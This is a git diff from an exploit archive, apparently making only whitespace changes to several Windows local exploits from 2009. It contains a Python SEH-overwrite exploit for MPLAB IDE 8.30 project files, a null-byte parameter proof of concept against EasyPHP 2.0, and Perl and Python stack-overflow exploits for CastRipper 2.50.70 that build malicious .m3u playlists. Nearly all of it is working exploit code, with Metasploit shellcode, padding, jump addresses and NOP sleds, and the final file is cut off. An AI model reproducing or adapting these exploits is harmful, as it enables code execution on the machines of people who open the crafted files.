--- a/platforms/windows/local/8656.py
+++ b/platforms/windows/local/8656.py
@@ -1,78 +1,78 @@
-# usage: mplab.py then open the project file :)
-# Download : http://ww1.microchip.com/downloads/en/DeviceDoc/MPLAB_8.30.zip (nadli chouk fi rassi :p)
-print "**************************************************************************"
-print " MPLAB IDE 8.30 (.mcp) Universal Seh Overwrite Exploit\n"
-print " Refer : Secunia advisory (35054)\n"
-print " Exploit code: His0k4\n"
-print " Tested on: Windows XP Pro SP3 (EN)\n"
-print " Greetings to:"
-print " All friends & muslims HaCkers(dz),snakespc.com\n"
-print "**************************************************************************"
-         	
-
-header1 = (
-"\x5b\x48\x45\x41\x44\x45\x52\x5d\x0d\x0a\x6d\x61\x67\x69\x63\x5f"
-"\x63\x6f\x6f\x6b\x69\x65\x3d\x7b\x36\x36\x45\x39\x39\x42\x30\x37"
-"\x2d\x45\x37\x30\x36\x2d\x34\x36\x38\x39\x2d\x39\x45\x38\x30\x2d"
-"\x39\x42\x32\x35\x38\x32\x38\x39\x38\x41\x31\x33\x7d\x0d\x0a\x66"
-"\x69\x6c\x65\x5f\x76\x65\x72\x73\x69\x6f\x6e\x3d\x31\x2e\x30\x0d"
-"\x0a\x5b\x50\x41\x54\x48\x5f\x49\x4e\x46\x4f\x5d\x0d\x0a\x64\x69"
-"\x72\x5f\x73\x72\x63\x3d\x0d\x0a\x64\x69\x72\x5f\x62\x69\x6e\x3d"
-"\x0d\x0a\x64\x69\x72\x5f\x74\x6d\x70\x3d\x0d\x0a\x64\x69\x72\x5f"
-"\x73\x69\x6e\x3d\x0d\x0a\x64\x69\x72\x5f\x69\x6e\x63\x3d\x0d\x0a"
-"\x64\x69\x72\x5f\x6c\x69\x62\x3d\x0d\x0a\x64\x69\x72\x5f\x6c\x6b"
-"\x72\x3d\x0d\x0a\x5b\x43\x41\x54\x5f\x46\x49\x4c\x54\x45\x52\x53"
-"\x5d\x0d\x0a\x66\x69\x6c\x74\x65\x72\x5f\x73\x72\x63\x3d\x2a\x2e"
-"\x61\x73\x6d\x0d\x0a\x66\x69\x6c\x74\x65\x72\x5f\x69\x6e\x63\x3d"
-"\x2a\x2e\x68\x3b\x2a\x2e\x69\x6e\x63\x0d\x0a\x66\x69\x6c\x74\x65"
-"\x72\x5f\x6f\x62\x6a\x3d\x2a\x2e\x6f\x0d\x0a\x66\x69\x6c\x74\x65"
-"\x72\x5f\x6c\x69\x62\x3d\x2a\x2e\x6c\x69\x62\x0d\x0a\x66\x69\x6c"
-"\x74\x65\x72\x5f\x6c\x6b\x72\x3d\x2a\x2e\x6c\x6b\x72\x0d\x0a\x5b"
-"\x53\x55\x49\x54\x45\x5f\x49\x4e\x46\x4f\x5d\x0d\x0a\x73\x75\x69"
-"\x74\x65\x5f\x67\x75\x69\x64\x3d\x7b\x36\x42\x33\x44\x41\x41\x37"
-"\x38\x2d\x35\x39\x43\x31\x2d\x34\x36\x44\x44\x2d\x42\x36\x41\x41"
-"\x2d\x44\x42\x44\x41\x45\x34\x45\x30\x36\x34\x38\x34\x7d\x0d\x0a"
-"\x73\x75\x69\x74\x65\x5f\x73\x74\x61\x74\x65\x3d\x0d\x0a\x5b\x54"
-"\x4f\x4f\x4c\x5f\x53\x45\x54\x54\x49\x4e\x47\x53\x5d\x0d\x0a\x54"
-"\x53\x7b\x42\x46\x44\x32\x37\x46\x42\x41\x2d\x34\x41\x30\x32\x2d"
-"\x34\x43\x30\x45\x2d\x41\x35\x45\x35\x2d\x42\x38\x31\x32\x46\x33"
-"\x45\x37\x37\x30\x37\x43\x7d\x3d\x2f\x6f\x22")
-
-header2 = (
-"\x2e\x63\x6f\x66\x22\x0d\x0a\x54\x53\x7b\x41\x44\x45\x39\x33\x41"
-"\x35\x35\x2d\x43\x37\x43\x37\x2d\x34\x44\x34\x44\x2d\x41\x34\x42"
-"\x41\x2d\x35\x39\x33\x30\x35\x46\x37\x44\x30\x33\x39\x31\x7d\x3d"
-"\x0d\x0a")
-
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-shellcode=(
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x79"
-"\x1f\x8c\x11\x83\xeb\xfc\xe2\xf4\x85\xf7\xc8\x11\x79\x1f\x07\x54"
-"\x45\x94\xf0\x14\x01\x1e\x63\x9a\x36\x07\x07\x4e\x59\x1e\x67\x58"
-"\xf2\x2b\x07\x10\x97\x2e\x4c\x88\xd5\x9b\x4c\x65\x7e\xde\x46\x1c"
-"\x78\xdd\x67\xe5\x42\x4b\xa8\x15\x0c\xfa\x07\x4e\x5d\x1e\x67\x77"
-"\xf2\x13\xc7\x9a\x26\x03\x8d\xfa\xf2\x03\x07\x10\x92\x96\xd0\x35"
-"\x7d\xdc\xbd\xd1\x1d\x94\xcc\x21\xfc\xdf\xf4\x1d\xf2\x5f\x80\x9a"
-"\x09\x03\x21\x9a\x11\x17\x67\x18\xf2\x9f\x3c\x11\x79\x1f\x07\x79"
-"\x45\x40\xbd\xe7\x19\x49\x05\xe9\xfa\xdf\xf7\x41\x11\xef\x06\x15"
-"\x26\x77\x14\xef\xf3\x11\xdb\xee\x9e\x7c\xed\x7d\x1a\x1f\x8c\x11")
-	
-buff = "\x41" * (226-len(shellcode))
-next_seh = "\x74\xc9\x41\x42"
-seh = "\x12\x13\x40\x00" #p/p/r MPLAB.exe
-nops1 = "\x90"*20
-nops2 = "\x90"*28
-mshellcode = "\xE9\x47\xFF\xFF\xFF" #welli 3liya :p
-
-exploit = header1 + buff + shellcode + nops1 + mshellcode + nops2 + next_seh + seh + header2
-
-try:
-    out_file = open("exploit.mcp",'w')
-    out_file.write(exploit)
-    out_file.close()
-    raw_input("\nExploit file created!\n")
-except:
-    print "Error"
-
-# milw0rm.com [2009-05-11]
+# usage: mplab.py then open the project file :)
+# Download : http://ww1.microchip.com/downloads/en/DeviceDoc/MPLAB_8.30.zip (nadli chouk fi rassi :p)
+print "**************************************************************************"
+print " MPLAB IDE 8.30 (.mcp) Universal Seh Overwrite Exploit\n"
+print " Refer : Secunia advisory (35054)\n"
+print " Exploit code: His0k4\n"
+print " Tested on: Windows XP Pro SP3 (EN)\n"
+print " Greetings to:"
+print " All friends & muslims HaCkers(dz),snakespc.com\n"
+print "**************************************************************************"
+         	
+
+header1 = (
+"\x5b\x48\x45\x41\x44\x45\x52\x5d\x0d\x0a\x6d\x61\x67\x69\x63\x5f"
+"\x63\x6f\x6f\x6b\x69\x65\x3d\x7b\x36\x36\x45\x39\x39\x42\x30\x37"
+"\x2d\x45\x37\x30\x36\x2d\x34\x36\x38\x39\x2d\x39\x45\x38\x30\x2d"
+"\x39\x42\x32\x35\x38\x32\x38\x39\x38\x41\x31\x33\x7d\x0d\x0a\x66"
+"\x69\x6c\x65\x5f\x76\x65\x72\x73\x69\x6f\x6e\x3d\x31\x2e\x30\x0d"
+"\x0a\x5b\x50\x41\x54\x48\x5f\x49\x4e\x46\x4f\x5d\x0d\x0a\x64\x69"
+"\x72\x5f\x73\x72\x63\x3d\x0d\x0a\x64\x69\x72\x5f\x62\x69\x6e\x3d"
+"\x0d\x0a\x64\x69\x72\x5f\x74\x6d\x70\x3d\x0d\x0a\x64\x69\x72\x5f"
+"\x73\x69\x6e\x3d\x0d\x0a\x64\x69\x72\x5f\x69\x6e\x63\x3d\x0d\x0a"
+"\x64\x69\x72\x5f\x6c\x69\x62\x3d\x0d\x0a\x64\x69\x72\x5f\x6c\x6b"
+"\x72\x3d\x0d\x0a\x5b\x43\x41\x54\x5f\x46\x49\x4c\x54\x45\x52\x53"
+"\x5d\x0d\x0a\x66\x69\x6c\x74\x65\x72\x5f\x73\x72\x63\x3d\x2a\x2e"
+"\x61\x73\x6d\x0d\x0a\x66\x69\x6c\x74\x65\x72\x5f\x69\x6e\x63\x3d"
+"\x2a\x2e\x68\x3b\x2a\x2e\x69\x6e\x63\x0d\x0a\x66\x69\x6c\x74\x65"
+"\x72\x5f\x6f\x62\x6a\x3d\x2a\x2e\x6f\x0d\x0a\x66\x69\x6c\x74\x65"
+"\x72\x5f\x6c\x69\x62\x3d\x2a\x2e\x6c\x69\x62\x0d\x0a\x66\x69\x6c"
+"\x74\x65\x72\x5f\x6c\x6b\x72\x3d\x2a\x2e\x6c\x6b\x72\x0d\x0a\x5b"
+"\x53\x55\x49\x54\x45\x5f\x49\x4e\x46\x4f\x5d\x0d\x0a\x73\x75\x69"
+"\x74\x65\x5f\x67\x75\x69\x64\x3d\x7b\x36\x42\x33\x44\x41\x41\x37"
+"\x38\x2d\x35\x39\x43\x31\x2d\x34\x36\x44\x44\x2d\x42\x36\x41\x41"
+"\x2d\x44\x42\x44\x41\x45\x34\x45\x30\x36\x34\x38\x34\x7d\x0d\x0a"
+"\x73\x75\x69\x74\x65\x5f\x73\x74\x61\x74\x65\x3d\x0d\x0a\x5b\x54"
+"\x4f\x4f\x4c\x5f\x53\x45\x54\x54\x49\x4e\x47\x53\x5d\x0d\x0a\x54"
+"\x53\x7b\x42\x46\x44\x32\x37\x46\x42\x41\x2d\x34\x41\x30\x32\x2d"
+"\x34\x43\x30\x45\x2d\x41\x35\x45\x35\x2d\x42\x38\x31\x32\x46\x33"
+"\x45\x37\x37\x30\x37\x43\x7d\x3d\x2f\x6f\x22")
+
+header2 = (
+"\x2e\x63\x6f\x66\x22\x0d\x0a\x54\x53\x7b\x41\x44\x45\x39\x33\x41"
+"\x35\x35\x2d\x43\x37\x43\x37\x2d\x34\x44\x34\x44\x2d\x41\x34\x42"
+"\x41\x2d\x35\x39\x33\x30\x35\x46\x37\x44\x30\x33\x39\x31\x7d\x3d"
+"\x0d\x0a")
+
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+shellcode=(
+"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x79"
+"\x1f\x8c\x11\x83\xeb\xfc\xe2\xf4\x85\xf7\xc8\x11\x79\x1f\x07\x54"
+"\x45\x94\xf0\x14\x01\x1e\x63\x9a\x36\x07\x07\x4e\x59\x1e\x67\x58"
+"\xf2\x2b\x07\x10\x97\x2e\x4c\x88\xd5\x9b\x4c\x65\x7e\xde\x46\x1c"
+"\x78\xdd\x67\xe5\x42\x4b\xa8\x15\x0c\xfa\x07\x4e\x5d\x1e\x67\x77"
+"\xf2\x13\xc7\x9a\x26\x03\x8d\xfa\xf2\x03\x07\x10\x92\x96\xd0\x35"
+"\x7d\xdc\xbd\xd1\x1d\x94\xcc\x21\xfc\xdf\xf4\x1d\xf2\x5f\x80\x9a"
+"\x09\x03\x21\x9a\x11\x17\x67\x18\xf2\x9f\x3c\x11\x79\x1f\x07\x79"
+"\x45\x40\xbd\xe7\x19\x49\x05\xe9\xfa\xdf\xf7\x41\x11\xef\x06\x15"
+"\x26\x77\x14\xef\xf3\x11\xdb\xee\x9e\x7c\xed\x7d\x1a\x1f\x8c\x11")
+	
+buff = "\x41" * (226-len(shellcode))
+next_seh = "\x74\xc9\x41\x42"
+seh = "\x12\x13\x40\x00" #p/p/r MPLAB.exe
+nops1 = "\x90"*20
+nops2 = "\x90"*28
+mshellcode = "\xE9\x47\xFF\xFF\xFF" #welli 3liya :p
+
+exploit = header1 + buff + shellcode + nops1 + mshellcode + nops2 + next_seh + seh + header2
+
+try:
+    out_file = open("exploit.mcp",'w')
+    out_file.write(exploit)
+    out_file.close()
+    raw_input("\nExploit file created!\n")
+except:
+    print "Error"
+
+# milw0rm.com [2009-05-11]
diff --git a/platforms/windows/local/8657.txt b/platforms/windows/local/8657.txt
index 39273a654..d97003ed9 100755
--- a/platforms/windows/local/8657.txt
+++ b/platforms/windows/local/8657.txt
@@ -1,41 +1,40 @@
-
-Bug         : Arbitrary Modify Configuration File
-Vendor      : EasyPHP
-Vendor URI  : http://sourceforge.net/projects/quickeasyphp/
-Product     : EasyPHP 2.0
-Author      : Zigma [zigmatn  @  gmail.com]
-              http://NullArea.NET
-
-Description :
-
-EasyPHP is a WAMP software bundle that installs web server services onto the Windows computer and allows quick-and-easy development of PHP and MySQL on a localhost (also known as 127.0.0.1). 
-The package includes an Apache server, a MySQL database, and the PHP extension.
-
-[+] Analyis :  
-
-A slight look on i18n.inc 
-                   
-if (isset($_GET['lang']) AND $_GET['lang'] != $lang)
-{
-	$fp = fopen($filename, "r");
-	$ini_contents = fread($fp, filesize($filename));
-	fclose($fp);
-	$ini_contents = str_replace("LangAdmin=".$lang, "LangAdmin=".$_GET['lang'], $ini_contents); <--
-	$fp = fopen($filename, "w");
-	fputs($fp,$ini_contents);
-	fclose($fp);
-	Header("Location: " . $_SERVER['PHP_SELF']); 
-	exit;
-}
-
-EasyPHP does not verify user Input ( Lang parameter ) wich leads to arbitrary overwrite EasyPHP configuration file (EasyPHP.ini) .  
-
-[+] Proof Of Concept  :
-
-The request :
-
-http://localhost/index.php?lang=fr%00Lang=Overwritten
-
-Results in overwriting EasyPHP.ini Adding the string "Lang=Overwritten".
-
-# milw0rm.com [2009-05-11]
+Bug         : Arbitrary Modify Configuration File
+Vendor      : EasyPHP
+Vendor URI  : http://sourceforge.net/projects/quickeasyphp/
+Product     : EasyPHP 2.0
+Author      : Zigma [zigmatn  @  gmail.com]
+              http://NullArea.NET
+
+Description :
+
+EasyPHP is a WAMP software bundle that installs web server services onto the Windows computer and allows quick-and-easy development of PHP and MySQL on a localhost (also known as 127.0.0.1). 
+The package includes an Apache server, a MySQL database, and the PHP extension.
+
+[+] Analyis :  
+
+A slight look on i18n.inc 
+                   
+if (isset($_GET['lang']) AND $_GET['lang'] != $lang)
+{
+	$fp = fopen($filename, "r");
+	$ini_contents = fread($fp, filesize($filename));
+	fclose($fp);
+	$ini_contents = str_replace("LangAdmin=".$lang, "LangAdmin=".$_GET['lang'], $ini_contents); <--
+	$fp = fopen($filename, "w");
+	fputs($fp,$ini_contents);
+	fclose($fp);
+	Header("Location: " . $_SERVER['PHP_SELF']); 
+	exit;
+}
+
+EasyPHP does not verify user Input ( Lang parameter ) wich leads to arbitrary overwrite EasyPHP configuration file (EasyPHP.ini) .  
+
+[+] Proof Of Concept  :
+
+The request :
+
+http://localhost/index.php?lang=fr%00Lang=Overwritten
+
+Results in overwriting EasyPHP.ini Adding the string "Lang=Overwritten".
+
+# milw0rm.com [2009-05-11]
diff --git a/platforms/windows/local/8660.pl b/platforms/windows/local/8660.pl
index f5126d907..52536a54f 100755
--- a/platforms/windows/local/8660.pl
+++ b/platforms/windows/local/8660.pl
@@ -1,42 +1,42 @@
-#!/usr/bin/perl
-#[+]--------------------------------------------------------------------------------------[+]#
-# CastRipper 2.50.70 (.m3u) Local buffer Overflow Exploit
-# By [0]x80->[H]4x²0r
-# hashteck[at]Gmail[dot]com
-# From Morocco
-#[+]--------------------------------------------------------------------------------------[+]#
-# program : CastRipper
-# version : 2.50.70
-# download : http://www.mini-stream.net/castripper/
-#[+]--------------------------------------------------------------------------------------[+]#
-# Tested Under Win$hit Vista Pro
-# After launching the sploit just drag&drop the .m3u file in the Ripper , Enjoy ;)#
-# NOTE : if you want to use it under an other version of Win32 use jmpfind.exe 
-#( avalaible on the net) to find a matching address with which you'll overwrite your EIP .
-#[+]--------------------------------------------------------------------------------------[+]#
-##################################### Proud to be Moroccan ###################################
-
-
-$junk="\x41" x 17379;
-$eip="\xF8\x03\xB1\x76"; # 0x76B103F8 jmp ESP - Kernel32.dll
-$nops="\x46" x 10;
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-$shell =
-"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x88".
-"\xd3\x37\xcc\x83\xeb\xfc\xe2\xf4\x74\x3b\x73\xcc\x88\xd3\xbc\x89".
-"\xb4\x58\x4b\xc9\xf0\xd2\xd8\x47\xc7\xcb\xbc\x93\xa8\xd2\xdc\x85".
-"\x03\xe7\xbc\xcd\x66\xe2\xf7\x55\x24\x57\xf7\xb8\x8f\x12\xfd\xc1".
-"\x89\x11\xdc\x38\xb3\x87\x13\xc8\xfd\x36\xbc\x93\xac\xd2\xdc\xaa".
-"\x03\xdf\x7c\x47\xd7\xcf\x36\x27\x03\xcf\xbc\xcd\x63\x5a\x6b\xe8".
-"\x8c\x10\x06\x0c\xec\x58\x77\xfc\x0d\x13\x4f\xc0\x03\x93\x3b\x47".
-"\xf8\xcf\x9a\x47\xe0\xdb\xdc\xc5\x03\x53\x87\xcc\x88\xd3\xbc\xa4".
-"\xb4\x8c\x06\x3a\xe8\x85\xbe\x34\x0b\x13\x4c\x9c\xe0\x23\xbd\xc8".
-"\xd7\xbb\xaf\x32\x02\xdd\x60\x33\x6f\xb0\x56\xa0\xeb\xd3\x37\xcc";
-
-# | --------------Junk-------------|-EIP-|----Nops----|-----------Shellcode----------|
-open(m3u,">>Exploit.m3u");
-print m3u $junk.$eip.$nops.$shell;
-print "[+] Done !! [+]";
-close(m3u);
-
-# milw0rm.com [2009-05-12]
+#!/usr/bin/perl
+#[+]--------------------------------------------------------------------------------------[+]#
+# CastRipper 2.50.70 (.m3u) Local buffer Overflow Exploit
+# By [0]x80->[H]4x²0r
+# hashteck[at]Gmail[dot]com
+# From Morocco
+#[+]--------------------------------------------------------------------------------------[+]#
+# program : CastRipper
+# version : 2.50.70
+# download : http://www.mini-stream.net/castripper/
+#[+]--------------------------------------------------------------------------------------[+]#
+# Tested Under Win$hit Vista Pro
+# After launching the sploit just drag&drop the .m3u file in the Ripper , Enjoy ;)#
+# NOTE : if you want to use it under an other version of Win32 use jmpfind.exe 
+#( avalaible on the net) to find a matching address with which you'll overwrite your EIP .
+#[+]--------------------------------------------------------------------------------------[+]#
+##################################### Proud to be Moroccan ###################################
+
+
+$junk="\x41" x 17379;
+$eip="\xF8\x03\xB1\x76"; # 0x76B103F8 jmp ESP - Kernel32.dll
+$nops="\x46" x 10;
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+$shell =
+"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x88".
+"\xd3\x37\xcc\x83\xeb\xfc\xe2\xf4\x74\x3b\x73\xcc\x88\xd3\xbc\x89".
+"\xb4\x58\x4b\xc9\xf0\xd2\xd8\x47\xc7\xcb\xbc\x93\xa8\xd2\xdc\x85".
+"\x03\xe7\xbc\xcd\x66\xe2\xf7\x55\x24\x57\xf7\xb8\x8f\x12\xfd\xc1".
+"\x89\x11\xdc\x38\xb3\x87\x13\xc8\xfd\x36\xbc\x93\xac\xd2\xdc\xaa".
+"\x03\xdf\x7c\x47\xd7\xcf\x36\x27\x03\xcf\xbc\xcd\x63\x5a\x6b\xe8".
+"\x8c\x10\x06\x0c\xec\x58\x77\xfc\x0d\x13\x4f\xc0\x03\x93\x3b\x47".
+"\xf8\xcf\x9a\x47\xe0\xdb\xdc\xc5\x03\x53\x87\xcc\x88\xd3\xbc\xa4".
+"\xb4\x8c\x06\x3a\xe8\x85\xbe\x34\x0b\x13\x4c\x9c\xe0\x23\xbd\xc8".
+"\xd7\xbb\xaf\x32\x02\xdd\x60\x33\x6f\xb0\x56\xa0\xeb\xd3\x37\xcc";
+
+# | --------------Junk-------------|-EIP-|----Nops----|-----------Shellcode----------|
+open(m3u,">>Exploit.m3u");
+print m3u $junk.$eip.$nops.$shell;
+print "[+] Done !! [+]";
+close(m3u);
+
+# milw0rm.com [2009-05-12]
diff --git a/platforms/windows/local/8661.pl b/platforms/windows/local/8661.pl
index aabec9817..3f6196cbb 100755
--- a/platforms/windows/local/8661.pl
+++ b/platforms/windows/local/8661.pl
@@ -1,41 +1,41 @@
-#!/usr/bin/perl
-# CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit
-# Exploited By Stack
-# first exploiter :d http://www.milw0rm.com/exploits/8660 bien jouer :d frero
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-my $Bof="\x41" x 26328;
-my $ret="\x7D\xBC\x01\x10"; # Universall Ret Adress jmp esp 1001BC7D
- # Executable modules, item 6
- # Base=10000000
- # Size=0006F000 (454656.)
- # Entry=10023AAC CRutilit.
- # Name=CRutilit
- # Path=C:\Program Files\CastRipper\CRutility03.dll
-my $nop="\x90" x 20;
-open(MYFILE,'>>sploit.m3u');
-print MYFILE $Bof.$ret.$nop.$shellcode;
-close(MYFILE);
-
-# milw0rm.com [2009-05-12]
+#!/usr/bin/perl
+# CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit
+# Exploited By Stack
+# first exploiter :d http://www.milw0rm.com/exploits/8660 bien jouer :d frero
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
+"\x4e\x46\x43\x36\x42\x50\x5a";
+my $Bof="\x41" x 26328;
+my $ret="\x7D\xBC\x01\x10"; # Universall Ret Adress jmp esp 1001BC7D
+ # Executable modules, item 6
+ # Base=10000000
+ # Size=0006F000 (454656.)
+ # Entry=10023AAC CRutilit.
+ # Name=CRutilit
+ # Path=C:\Program Files\CastRipper\CRutility03.dll
+my $nop="\x90" x 20;
+open(MYFILE,'>>sploit.m3u');
+print MYFILE $Bof.$ret.$nop.$shellcode;
+close(MYFILE);
+
+# milw0rm.com [2009-05-12]
diff --git a/platforms/windows/local/8662.py b/platforms/windows/local/8662.py
index 387d2bb55..e947e1063 100755
--- a/platforms/windows/local/8662.py
+++ b/platforms/windows/local/8662.py
@@ -1,50 +1,50 @@
-#!/usr/bin/python
-print "**************************************************************************"
-print " CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit\n"
-print " Refer: http://www.milw0rm.com/exploits/8660\n"
-print " Exploit code: super-cristal\n"
-print " Tested on: Windows XP Pro SP3\n"
-print " Greetings to:"
-print " His0k4, all friends & muslims HaCkers(dz),snakespc.com\n"
-print "**************************************************************************"
-     
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com	 
-shellcode=(
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
-"\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x44\x4e\x53\x4b\x38\x4e\x57"
-"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x48"
-"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x53\x4b\x58"
-"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
-"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x33\x46\x55\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x38"
-"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x44"
-"\x4b\x58\x4f\x35\x4e\x41\x41\x50\x4b\x4e\x4b\x38\x4e\x31\x4b\x38"
-"\x41\x50\x4b\x4e\x49\x48\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43"
-"\x42\x4c\x46\x56\x4b\x38\x42\x34\x42\x43\x45\x38\x42\x4c\x4a\x37"
-"\x4e\x30\x4b\x48\x42\x54\x4e\x50\x4b\x38\x42\x57\x4e\x31\x4d\x4a"
-"\x4b\x58\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x38\x42\x4b"
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x46\x4e\x53\x4f\x35\x41\x43"
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
-"\x42\x55\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
-"\x50\x4f\x4c\x58\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x36\x41\x46"
-"\x4e\x46\x43\x36\x42\x50\x5a")
-
-buff =  "\x41" * 17367
-buff += "\x7D\xBC\x01\x10" # universal jmp esp
-buff += "\x90"*20
-buff += shellcode
-
-try:
-    out_file = open("exploit.m3u",'w')
-    out_file.write(buff)
-    out_file.close()
-    raw_input("\nExploit file created!\n")
-except:
-    print "Error"
-
-# milw0rm.com [2009-05-12]
+#!/usr/bin/python
+print "**************************************************************************"
+print " CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit\n"
+print " Refer: http://www.milw0rm.com/exploits/8660\n"
